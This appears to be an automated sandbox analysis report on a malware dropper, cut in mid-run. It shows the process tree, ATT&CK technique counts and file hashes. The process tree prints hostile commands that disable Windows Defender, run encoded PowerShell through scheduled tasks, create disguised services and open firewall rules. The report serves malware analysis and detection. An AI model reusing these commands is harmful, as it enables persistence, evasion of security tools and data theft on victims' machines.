                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im RD6tmZH473Mxiy1QiSni4Ipw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\RD6tmZH473Mxiy1QiSni4Ipw.exe" & del C:\ProgramData\*.dll & exit
                                                          7⤵
                                                            PID:6616
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im RD6tmZH473Mxiy1QiSni4Ipw.exe /f
                                                              8⤵
                                                              • Kills process with taskkill
                                                              PID:996
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              8⤵
                                                              • Delays execution with timeout.exe
                                                              PID:6276
                                                        • C:\Users\Admin\Documents\9mwVCm19d9gWrQGu9nBZuWD8.exe
                                                          "C:\Users\Admin\Documents\9mwVCm19d9gWrQGu9nBZuWD8.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Checks computer location settings
                                                          PID:5572
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                            7⤵
                                                              PID:5996
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd
                                                                8⤵
                                                                  PID:5264
                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                    tasklist /FI "imagename eq BullGuardCore.exe"
                                                                    9⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:768
                                                                  • C:\Windows\SysWOW64\find.exe
                                                                    find /I /N "bullguardcore.exe"
                                                                    9⤵
                                                                      PID:6212
                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                      tasklist /FI "imagename eq PSUAService.exe"
                                                                      9⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:5828
                                                                    • C:\Windows\SysWOW64\find.exe
                                                                      find /I /N "psuaservice.exe"
                                                                      9⤵
                                                                        PID:6784
                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                        findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                        9⤵
                                                                          PID:6436
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                          Accostarmi.exe.pif N
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:5552
                                                                  • C:\Users\Admin\Documents\n8_CxLe71_GIr_omHI3emyQO.exe
                                                                    "C:\Users\Admin\Documents\n8_CxLe71_GIr_omHI3emyQO.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    • Adds Run key to start application
                                                                    PID:5416
                                                                    • C:\Users\Admin\AppData\Local\Temp\dada.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\dada.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:6412
                                                                    • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Checks computer location settings
                                                                      PID:6540
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                                                                        8⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:6816
                                                                  • C:\Users\Admin\Documents\DnSUr5m02PxtLbSxliYLhS_O.exe
                                                                    "C:\Users\Admin\Documents\DnSUr5m02PxtLbSxliYLhS_O.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Checks processor information in registry
                                                                    PID:5408
                                                                  • C:\Users\Admin\Documents\ccvPZKnxQVnp6SMk85B2ULTz.exe
                                                                    "C:\Users\Admin\Documents\ccvPZKnxQVnp6SMk85B2ULTz.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:5400
                                                                  • C:\Users\Admin\Documents\vl8txTVy4WKIfcG7GdJi3UHD.exe
                                                                    "C:\Users\Admin\Documents\vl8txTVy4WKIfcG7GdJi3UHD.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:5384
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS5D5.tmp\Install.exe
                                                                      .\Install.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:1968
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS1E9C.tmp\Install.exe
                                                                        .\Install.exe /S /site_id "525403"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks computer location settings
                                                                        • Drops file in System32 directory
                                                                        • Enumerates system info in registry
                                                                        PID:4816
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                          9⤵
                                                                            PID:5376
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                              10⤵
                                                                                PID:6820
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5744
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                  11⤵
                                                                                    PID:5272
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                9⤵
                                                                                  PID:7108
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                    10⤵
                                                                                      PID:2124
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                        11⤵
                                                                                          PID:5304
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                          11⤵
                                                                                            PID:6376
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /CREATE /TN "gscIZCLGx" /SC once /ST 01:06:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                        9⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:6004
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /run /I /tn "gscIZCLGx"
                                                                                        9⤵
                                                                                          PID:3796
                                                                                  • C:\Users\Admin\Documents\vuT2PIE6PhD4AILOarquXntr.exe
                                                                                    "C:\Users\Admin\Documents\vuT2PIE6PhD4AILOarquXntr.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5372
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 900
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:6676
                                                                                  • C:\Users\Admin\Documents\fssUXsmjbrvldMR6Zvp75yT6.exe
                                                                                    "C:\Users\Admin\Documents\fssUXsmjbrvldMR6Zvp75yT6.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5628
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 444
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5812
                                                                                  • C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe
                                                                                    "C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe"
                                                                                    6⤵
                                                                                      PID:5744
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rgrsamop\
                                                                                        7⤵
                                                                                          PID:4868
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\iaghphix.exe" C:\Windows\SysWOW64\rgrsamop\
                                                                                          7⤵
                                                                                            PID:6204
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            "C:\Windows\System32\sc.exe" description rgrsamop "wifi internet conection"
                                                                                            7⤵
                                                                                              PID:6660
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              "C:\Windows\System32\sc.exe" start rgrsamop
                                                                                              7⤵
                                                                                                PID:6808
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                "C:\Windows\System32\sc.exe" create rgrsamop binPath= "C:\Windows\SysWOW64\rgrsamop\iaghphix.exe /d\"C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                7⤵
                                                                                                  PID:6428
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                  7⤵
                                                                                                    PID:6960
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 1256
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:7064
                                                                                                • C:\Users\Admin\Documents\F1_vMNmHEe9SnGkmIibX0lSm.exe
                                                                                                  "C:\Users\Admin\Documents\F1_vMNmHEe9SnGkmIibX0lSm.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5796
                                                                                                • C:\Users\Admin\Documents\IRqBjdGvO3HADSt6rUEhDsXS.exe
                                                                                                  "C:\Users\Admin\Documents\IRqBjdGvO3HADSt6rUEhDsXS.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5788
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 428
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:3420
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 440
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:1080
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sahiba_5.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4860
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_5.exe
                                                                                                sahiba_5.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1272
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sahiba_4.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4236
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_4.exe
                                                                                                sahiba_4.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4756
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sahiba_3.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3724
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_3.exe
                                                                                                sahiba_3.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies system certificate store
                                                                                                PID:1504
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 1064
                                                                                                  6⤵
                                                                                                  • Program crash
                                                                                                  PID:4872
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sahiba_2.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4980
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_2.exe
                                                                                                sahiba_2.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:4792
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sahiba_1.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1640
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_1.exe
                                                                                                sahiba_1.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks computer location settings
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4784
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_1.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_1.exe" -a
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:308
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\sahiba_7.exe
                                                                                        sahiba_7.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1164
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2104
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1780
                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                        1⤵
                                                                                        • Process spawned unexpected child process
                                                                                        PID:1692
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                          2⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:2208
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 608
                                                                                            3⤵
                                                                                            • Program crash
                                                                                            PID:3272
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2208 -ip 2208
                                                                                        1⤵
                                                                                          PID:2624
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1504 -ip 1504
                                                                                          1⤵
                                                                                            PID:5116
                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                            C:\Windows\system32\WerFault.exe -pss -s 528 -p 1344 -ip 1344
                                                                                            1⤵
                                                                                              PID:3316
                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                              C:\Windows\system32\WerFault.exe -pss -s 544 -p 1344 -ip 1344
                                                                                              1⤵
                                                                                                PID:1468
                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4452
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                  1⤵
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2268
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5628 -ip 5628
                                                                                                  1⤵
                                                                                                    PID:4688
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5788 -ip 5788
                                                                                                    1⤵
                                                                                                      PID:5560
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5320 -ip 5320
                                                                                                      1⤵
                                                                                                        PID:3264
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5352 -ip 5352
                                                                                                        1⤵
                                                                                                          PID:6032
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2132 -ip 2132
                                                                                                          1⤵
                                                                                                            PID:5260
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5352 -ip 5352
                                                                                                            1⤵
                                                                                                              PID:5484
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5788 -ip 5788
                                                                                                              1⤵
                                                                                                                PID:1080
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5424 -ip 5424
                                                                                                                1⤵
                                                                                                                  PID:3564
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5628 -ip 5628
                                                                                                                  1⤵
                                                                                                                    PID:6168
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5320 -ip 5320
                                                                                                                    1⤵
                                                                                                                      PID:4560
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5320 -ip 5320
                                                                                                                      1⤵
                                                                                                                        PID:6288
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5320 -ip 5320
                                                                                                                        1⤵
                                                                                                                          PID:6448
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5372 -ip 5372
                                                                                                                          1⤵
                                                                                                                            PID:6552
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5744 -ip 5744
                                                                                                                            1⤵
                                                                                                                              PID:6980
                                                                                                                            • C:\Windows\SysWOW64\rgrsamop\iaghphix.exe
                                                                                                                              C:\Windows\SysWOW64\rgrsamop\iaghphix.exe /d"C:\Users\Admin\Documents\9HQpyhe09hiHI_EcwfONmvON.exe"
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:7016
                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                svchost.exe
                                                                                                                                2⤵
                                                                                                                                  PID:6548
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 560
                                                                                                                                  2⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:5336
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5320 -ip 5320
                                                                                                                                1⤵
                                                                                                                                  PID:3680
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5320 -ip 5320
                                                                                                                                  1⤵
                                                                                                                                    PID:6556
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7016 -ip 7016
                                                                                                                                    1⤵
                                                                                                                                      PID:6008
                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 488 -p 464 -ip 464
                                                                                                                                      1⤵
                                                                                                                                        PID:5904
                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 604 -p 464 -ip 464
                                                                                                                                        1⤵
                                                                                                                                          PID:5260
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 5320 -ip 5320
                                                                                                                                          1⤵
                                                                                                                                            PID:6888
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5320 -ip 5320
                                                                                                                                            1⤵
                                                                                                                                              PID:5468
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5320 -ip 5320
                                                                                                                                              1⤵
                                                                                                                                                PID:7160
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5424 -ip 5424
                                                                                                                                                1⤵
                                                                                                                                                  PID:4604
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5424 -ip 5424
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5716
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5424 -ip 5424
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1960
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5924

                                                                                                                                                      Network

                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                      Execution

                                                                                                                                                      Scheduled Task

                                                                                                                                                      1
                                                                                                                                                      T1053

                                                                                                                                                      Persistence

                                                                                                                                                      Modify Existing Service

                                                                                                                                                      2
                                                                                                                                                      T1031

                                                                                                                                                      New Service

                                                                                                                                                      1
                                                                                                                                                      T1050

                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                      1
                                                                                                                                                      T1060

                                                                                                                                                      Scheduled Task

                                                                                                                                                      1
                                                                                                                                                      T1053

                                                                                                                                                      Privilege Escalation

                                                                                                                                                      New Service

                                                                                                                                                      1
                                                                                                                                                      T1050

                                                                                                                                                      Scheduled Task

                                                                                                                                                      1
                                                                                                                                                      T1053

                                                                                                                                                      Defense Evasion

                                                                                                                                                      Modify Registry

                                                                                                                                                      4
                                                                                                                                                      T1112

                                                                                                                                                      Disabling Security Tools

                                                                                                                                                      1
                                                                                                                                                      T1089

                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                      1
                                                                                                                                                      T1497

                                                                                                                                                      Install Root Certificate

                                                                                                                                                      1
                                                                                                                                                      T1130

                                                                                                                                                      Credential Access

                                                                                                                                                      Credentials in Files

                                                                                                                                                      4
                                                                                                                                                      T1081

                                                                                                                                                      Discovery

                                                                                                                                                      Query Registry

                                                                                                                                                      7
                                                                                                                                                      T1012

                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                      1
                                                                                                                                                      T1497

                                                                                                                                                      System Information Discovery

                                                                                                                                                      6
                                                                                                                                                      T1082

                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                      1
                                                                                                                                                      T1120

                                                                                                                                                      Process Discovery

                                                                                                                                                      1
                                                                                                                                                      T1057

                                                                                                                                                      Collection

                                                                                                                                                      Data from Local System

                                                                                                                                                      4
                                                                                                                                                      T1005

                                                                                                                                                      Command and Control

                                                                                                                                                      Web Service

                                                                                                                                                      1
                                                                                                                                                      T1102

                                                                                                                                                      Replay Monitor

                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                      Downloads

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BIRZAC~1.EXE.log
                                                                                                                                                        MD5

                                                                                                                                                        3654bd2c6957761095206ffdf92b0cb9

                                                                                                                                                        SHA1

                                                                                                                                                        6f10f7b5867877de7629afcff644c265e79b4ad3

                                                                                                                                                        SHA256

                                                                                                                                                        c2a4be94cf4ed33d698d9838f4ffb47047da796e733ec11562463a1621212ab4

                                                                                                                                                        SHA512

                                                                                                                                                        e2a81248cca7732ce098088d5237897493fd3629e28d66bc13e5f9191f72cd52893f4a53905906af12d5c6de475738b6c7f6b718a32869e9ee0deb3a54672f79

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurl.dll
                                                                                                                                                        MD5

                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                        SHA1

                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                        SHA256

                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                        SHA512

                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurl.dll
                                                                                                                                                        MD5

                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                        SHA1

                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                        SHA256

                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                        SHA512

                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurlpp.dll
                                                                                                                                                        MD5

                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                        SHA1

                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                        SHA256

                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                        SHA512

                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8C951EBD\libcurlpp.dll
                                                                                                                                                        MD5

